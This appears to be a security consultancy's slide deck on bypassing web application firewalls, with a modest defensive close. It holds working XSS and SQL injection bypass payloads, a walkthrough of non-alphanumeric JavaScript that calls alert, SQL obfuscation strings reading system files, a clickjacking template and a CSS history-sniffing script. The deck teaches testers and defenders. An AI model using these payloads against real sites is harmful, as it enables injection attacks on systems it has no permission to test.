
Bypassing Web Application Firewalls (WAFs)

Ing. Pavol Lupták, CISSP, CEH
Lead Security Consultant

www.nethemba.com

Nethemba - All About Security

Highly experienced certified IT security experts (CISSP, C|EH, SCSecA)
Core business: all kinds of penetration tests, comprehensive web application security audits, local system and wifi security audits, security consulting, forensic analysis, secure VoIP, ultra secure systems
OWASP activists: leaders of the Slovak/Czech OWASP chapters, co-authors of the most recognized OWASP Testing Guide v3.0, working on the new version
We are the only one in Slovakia/Czech Republic that offers:
Penetration tests and security audits of SAP
Security audit of smart RFID cards
Unique own and sponsored security research in many areas (see our references: vulnerabilities in public transport SMS tickets, cracked the most used Mifare Classic RFID cards)


What are WAFs?

Emerged from IDS/IPS, focused on the HTTP protocol and HTTP related attacks
Usually contain a lot of complex regexp rules to match
Support special features like cookie encryption, CSRF protection, etc.
Except for the free mod_security they are quite expensive (and often there is no correlation between the price and their filtering capabilities)


WAF implementations

Usually they are deployed in blacklisting mode, which is more vulnerable to bypasses and targeted attacks
The application context (the type of allowed inputs) must be known in order to deploy the more secure whitelisting mode
All WAFs can be bypassed
WAF is just a workaround, but from the security point of view it can be cost effective

WAF filter rules

Directly reflect WAF effectiveness
For most WAF vendors they are closely guarded secrets; most determined attackers are able to bypass them without seeing the actual rules
Open source WAFs (mod_security, PHPIDS) have open source rules, which is better: they get more scrutiny by skilled penetration testers


Typical WAF bypasses

Blocked Attack                           | Undetected modification
'or 1=1--                                | ' or 2=2--
alert(0)                                 | %00alert(0)
<script>alert(0)</script>                | <script type=vbscript>MsgBox(0)</script>
' or ''''='r                             | '/**/OR/**/''''='
<script>alert(0)</script>                | <img src=x:x onerror=alert(0)></img>
<img src=x:x onerror=alert(0)//></img>   | <img src=http://url onload=alert(0)//></img>
1 or 1=1                                 | (1)or(1)=(1)
eval(name)                               | x=this.name X(0?$:name+1)


Yes, WAF may also be vulnerable!

WAF also increases the attack surface of a target organization
WAF may be the target of, and vulnerable to, malicious attacks, e.g. XSS, SQL injection, denial of service attacks, remote code execution vulnerabilities
These vulnerabilities have been found in all types of WAF products (!)


Typical bypass flow

1. Find out which characters/sequences are allowed by the WAF
2. Make an obfuscated version of your injected payload
3. Test it and watch the WAF/application response
4. If it does not work, modify it and try step 2 again


Javascript obfuscation

Javascript has very powerful features
A Javascript payload is used in XSS attacks
It is full of evals, expression closures, generator expressions, iterators, special characters and shortcuts
Supports a lot of encodings (unicode multibyte characters, hexadecimal, octal, combinations of all of them)
Supports XOR, encryption, Base64


Non-alphanumeric javascript code

Even if only a few characters are allowed it is possible to construct fully functional code:

_=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;   // $=0, _=1, __=2, ___=3, ____=4, _____=5
$$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)+"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_];   // "constructor", picked out of "[object Object]", "NaN", "undefined", "false", "true"
$$$=(($!=$)+"")[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$];   // "alert"
$_$=({}+"")[+_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___];   // the argument string
($)[$$][$$]($$$+"('"+$_$+"')")()   // (0).constructor.constructor("alert('...')")()

([,,,,,,]=!{}+{},[[,]=!!+][+++])()[++++](~)


Let's bypass WAF!

Example situation: the WAF blocks alpha characters and numbers (probably not a very real situation, just a proof of concept :)
Allows only a few special characters: (){}_=[];$!+<>
Let's generate fully non-alphanumeric javascript code!


Possibilities of the Javascript language

We can use numbers to obtain a single character in a string, e.g. index zero for accessing the first character: abc[0]
We can use addition (+), subtraction (-), multiplication (*), division (/), modulus (%), increment (++), decrement (--)
We know that mathematical operators perform automatic numeric conversion and string operators perform automatic string conversion


Source of different alphanumeric characters in Javascript

Javascript object / error state | String result
{}+''                           | [object Object]
+[][+[]]                        | NaN
[][+[]]+[]                      | undefined
[![]]+[]                        | false
[!![]]+[]                       | true


Shortest Possible Ways to Create Zero without Using Numbers

Characters | Result
+[]        | 0
+''        | 0
+""        | 0
-[]        | 0
-''        | 0
-""        | 0


Generating numbers

+[]                               // 0
++[[]][+[]]                       // 1
+!+[]                             // 1
++[++[[]][+[]]][+[]]              // 2
!+[]+!+[]                         // 2
++[++[++[[]][+[]]][+[]]][+[]]     // 3
!+[]+!+[]+!+[]                    // 3


Gain alpha characters without directly using them

When we define a Javascript object using the object literal and concatenate it with a string, the result is [object Object]

_={}+''; // [object Object]

alert(_[1]) // returns the 'o' character


Generate the string 'alert' without using any alphanumeric characters

Let's start with 'a'
What Javascript object contains 'a'?
We can use 'NaN' (Not a Number)
Access the empty string with index 0 (undefined) and convert it to a number (NaN)
+[][+[]] // result: NaN


Generating the 'a' character

NaN[1]='a'

++[[]][+[]] // 1
+[][+[]]+[] // result string: NaN
(+[][+[]]+[])[++[[]][+[]]] // a

We have the character 'a'


Generating the 'l' character

Use boolean false
We can use the ! (NOT) operator
e.g. ''==0 // true
Use a blank array (string) and then the NOT operator to obtain a boolean, wrap it with [] and convert it to a string
([![]]+[]) // string false


Generating the 'l' character

++[++[[]][+[]]][+[]] // 2
([![]]+[]) // string false
'false'[2]=([![]]+[])[++[++[[]][+[]]][+[]]] // 'l'

We have the 'l' character!


Generating the 'e' character

It's easy, we can use boolean true
([!![]]+[]) // string 'true'
++[++[++[[]][+[]]][+[]]][+[]] // 3
'true'[3]=([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] // e

And we have the 'e' character!


Generating the 'r' character

It's easy, we can use boolean true
([!![]]+[]) // string 'true'
++[[]][+[]] // 1
'true'[1]=([!![]]+[])[++[[]][+[]]] // r

And we have the 'r' character!


Generating the 't' character

It's easy, we can use boolean true
([!![]]+[]) // string 'true'
+[] // 0
'true'[0]=([!![]]+[])[+[]] // t

And we have the 't' character!


And now we have the 'alert' string!

(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]] // string 'alert'


How to execute the code of our choice?

It is necessary to return the window object to access all properties of window
If you can access a constructor, you can access the Function constructor to execute arbitrary code
The shortest possible way to get window is:
alert((1,[].sort)()) // shows the window object!

Works in all browsers except IE


How to generate the 'sort' string

We know how to generate the string 'alert'
We need to generate the 'sort' string
'false'[3]=([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] // 's'

We can gain 'o' from []+{} ([object Object])
([]+{})[++[[]][+[]]] // o

We have already generated 'r' and 't'


And now we have the 'sort' string

([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]] // string 'sort'


Let's build it together: call alert(1)

(1,[].sort)().alert(1)

After changing the number 1 and all alpha characters to their obfuscated versions we get:

([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]](++[[]][+[]])

// calls alert(1)!


How to call any arbitrary Javascript function

Using the array constructor (accessing the constructor twice from an array object returns Function):
[].constructor.constructor("alert(1)")()

We need to generate the remaining letters 'c', 'n', 'u'; gain them from the output of the [].sort function:
function sort() { [native code] }


SQL obfuscation

What is obfuscation of an SQL injection vector?
Different DBMS have different SQL syntax; most of them support Unicode, Base64, hex, octal and binary representation, escaping, hashing algorithms (MD5, SHA1)
Many blacklisted characters can be replaced by their functional alternatives (0xA0 in MySQL)
Obfuscated comments: it is difficult to determine what is a comment and what is not

SQL obfuscation examples

SELECT CONCAT(char(x'70617373', b'1110111011011110111001001100100'))
s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1
SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
SELECT (extractvalue(0x3C613E61646D696E3C2F613,0x2F61))


New SQL features

MySQL/PostgreSQL support XML functions:
SELECT UpdateXML('<script x=_></script>', '/script/@x', 'src=//0x.lv');

HTML5 supports local DB storage (SQLite 3.1+) (openDatabase object): can be misused for persistent XSS, local SQL injection attacks


Existing obfuscation tools

Hackvertor: http://hackvertor.co.uk/public
HackBar: https://addons.mozilla.org/en-US/firefox/addon/hack
Malzilla: http://malzilla.sourceforge.net/
Your imagination :)


Summary

WAFs are just workarounds!
The best solution is to care about security in every SDLC phase and strictly validate all inputs and outputs in the application
Use whitelisting instead of blacklisting (both in the application and in the WAF!)
Use multilayer security: 3rd layer database architecture or database firewalls
for SQL use prepared statements
for HTML use HTML Purifier or the OWASP AntiSamy project
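The bypass table and the summary's whitelisting advice can be put side by side in code. The following is an added example, not code from the slides: a signature blacklist in the style of the "Blocked Attack" column, a per-field whitelist (a constructed username rule) and HTML output encoding, run over the table's own pairs and the non-alphanumeric expression the earlier slides build for the string 'alert'.

```javascript
// Added example, not code from the slides: the keyword blacklist implied by
// the "Blocked Attack" column versus the per-field whitelist and output
// encoding the summary recommends. Payloads come from the slides' bypass
// table; the field policy and other strings are constructed for this example.

// Signature-style blacklist: it knows the literal attacks and nothing else.
const BLACKLIST = /<script>|\balert\(|\bor 1=1|\beval\(/i;

function blacklistBlocks(input) {
  return BLACKLIST.test(input);
}

// Whitelist: the application knows what the field may contain and accepts
// only that, so the shape of a rejected value is irrelevant (constructed rule).
const FIELD_POLICY = { username: /^[a-z0-9_]{3,16}$/i };

function whitelistAccepts(field, input) {
  const rule = FIELD_POLICY[field];
  return rule !== undefined && rule.test(input);
}

// Output encoding for an HTML text context: stored data renders as text.
function htmlEscape(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// [blocked attack, undetected modification] pairs from the slides; the last
// row pairs alert(0) with the slides' non-alphanumeric 'alert' expression.
const SAMPLES = [
  ["'or 1=1--", "' or 2=2--"],
  ["alert(0)", "%00alert(0)"],
  ["<script>alert(0)</script>", "<script type=vbscript>MsgBox(0)</script>"],
  ["1 or 1=1", "(1)or(1)=(1)"],
  ["eval(name)", "x=this.name"],
  ["alert(0)", "(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]"],
];

// Per pair: does the blacklist catch the original, does it catch the
// modification, and does the username whitelist reject both?
function compareFilters() {
  return SAMPLES.map(([attack, modified]) => ({
    attack,
    blacklistCatchesAttack: blacklistBlocks(attack),
    blacklistCatchesModified: blacklistBlocks(modified),
    whitelistRejectsBoth: !whitelistAccepts('username', attack)
      && !whitelistAccepts('username', modified),
  }));
}
```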


References

Web Application Obfuscation
http://www.amazon.com/WebApplicationObfuscati

XSS Attacks: Cross Site Scripting Exploits and Defense
http://www.amazon.com/XSSAttacksScriptingExp

Special thanks to Mario Heiderich and Stefano Di Paola


UI redressing attacks: clickjacking

<style>
iframe{filter:alpha(opacity=0);opacity:0;position:absolute;top:0px;left:0px;height:300px;width:250px;}
img{position:absolute;top:0px;left:0px;height:300px;width:250px;}
</style>
<img src="WHAT THE USER SEES"/>
<iframe src="WHAT THE USER IS ACTUALLY INTERACTING WITH"></iframe>

Clickjacking protection

Blocks using X-FRAME-OPTIONS: NEVER

<body>
<script>
if(top!=self)document.write('<plaintext>');
</script>
...
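As an added example (not from the slides), the decision a browser makes from the two header-based framing defences: X-Frame-Options, whose defined values are DENY and SAMEORIGIN, and the CSP frame-ancestors directive, which takes precedence over X-Frame-Options when present. Header values and origins are constructed; the slide's frame-busting script remains a fallback for clients that honour neither header.

```javascript
// Added example, not code from the slides: how a browser decides whether a
// page may be framed, from the two header-based defences. X-Frame-Options
// accepts DENY or SAMEORIGIN; a CSP frame-ancestors directive lists allowed
// parent origins and, when present, takes precedence over X-Frame-Options.
// Header values and origins below are constructed for this example.

// X-Frame-Options: true means framing is allowed.
function xfoAllows(value, pageOrigin, parentOrigin) {
  if (value === undefined) return true;              // no header: framable
  const token = value.trim().toUpperCase();
  if (token === 'DENY') return false;
  if (token === 'SAMEORIGIN') return pageOrigin === parentOrigin;
  return true;   // unrecognised token (such as the slide's NEVER) is not enforced
}

// CSP frame-ancestors with 'none', 'self' and host sources (scheme-only
// sources are not handled here). Returns true when framing is allowed.
function frameAncestorsAllows(csp, pageOrigin, parentOrigin) {
  const directive = csp.split(';').map((d) => d.trim())
    .find((d) => d.startsWith('frame-ancestors'));
  if (directive === undefined) return true;
  const sources = directive.split(/\s+/).slice(1);
  if (sources.length === 0 || sources.includes("'none'")) return false;
  const parent = new URL(parentOrigin);
  const parentPort = parent.port || (parent.protocol === 'https:' ? '443' : '80');
  return sources.some((src) => {
    if (src === "'self'") return pageOrigin === parentOrigin;
    const m = /^(?:(https?):\/\/)?(\*\.)?([^:/*]+)(?::(\d+))?$/.exec(src);
    if (m === null) return false;
    const [, scheme, wildcard, host, port] = m;
    if (scheme !== undefined && scheme + ':' !== parent.protocol) return false;
    if (port !== undefined && port !== parentPort) return false;
    return wildcard ? parent.hostname.endsWith('.' + host) : parent.hostname === host;
  });
}

// Combined decision over a response's headers (lower-case header names).
function framingAllowed(headers, pageOrigin, parentOrigin) {
  const csp = headers['content-security-policy'];
  if (csp !== undefined && /(^|;)\s*frame-ancestors\b/.test(csp)) {
    return frameAncestorsAllows(csp, pageOrigin, parentOrigin);
  }
  return xfoAllows(headers['x-frame-options'], pageOrigin, parentOrigin);
}
```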


CSS History attack

<style>
a{position:relative;}
a:visited{position:absolute;}
</style>
<a id=v href=http://www.google.com/>Google</a>
<script>
var l=document.getElementById('v');
var c=getComputedStyle(l).position;
c=='absolute'?alert('visited'):alert('not visited');
</script>


CSS History exploitation methods

Social network deanonymization attacks
Session ID / CSRF token local bruteforce attack
LAN scanners
Fixed in Firefox 4.0, current browsers are vulnerable
